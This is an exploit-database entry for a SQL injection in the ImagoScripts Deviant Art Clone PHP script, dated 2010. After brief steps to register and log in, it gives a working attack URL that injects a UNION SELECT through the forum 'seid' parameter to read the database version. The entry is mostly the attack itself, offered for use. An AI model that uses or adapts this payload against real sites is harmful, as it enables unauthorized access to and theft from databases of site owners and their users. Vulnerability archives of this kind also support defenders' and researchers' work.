ImagoScripts Deviant Art Clone - SQL Injection

EDB-ID:

11002


Author:

alnjm33

Type:

webapps


Platform:

PHP

Date:

2010-01-04


Exploit Title:ImagoScripts Deviant Art Clone SQL Injection Vulnerability
Date: 4/1/2010
Author: alnjm33
Software Link: http://imagoscripts.com/index.php?act=viewProd&productId=2 it cost 50$ :)
________________________
first join in site
site/path/index.php?mode=join
then log in
and this is exploit
site/path//index.php?mode=forums&act=viewcat&seid=-1/**/union/**/select 1,version(),3,4--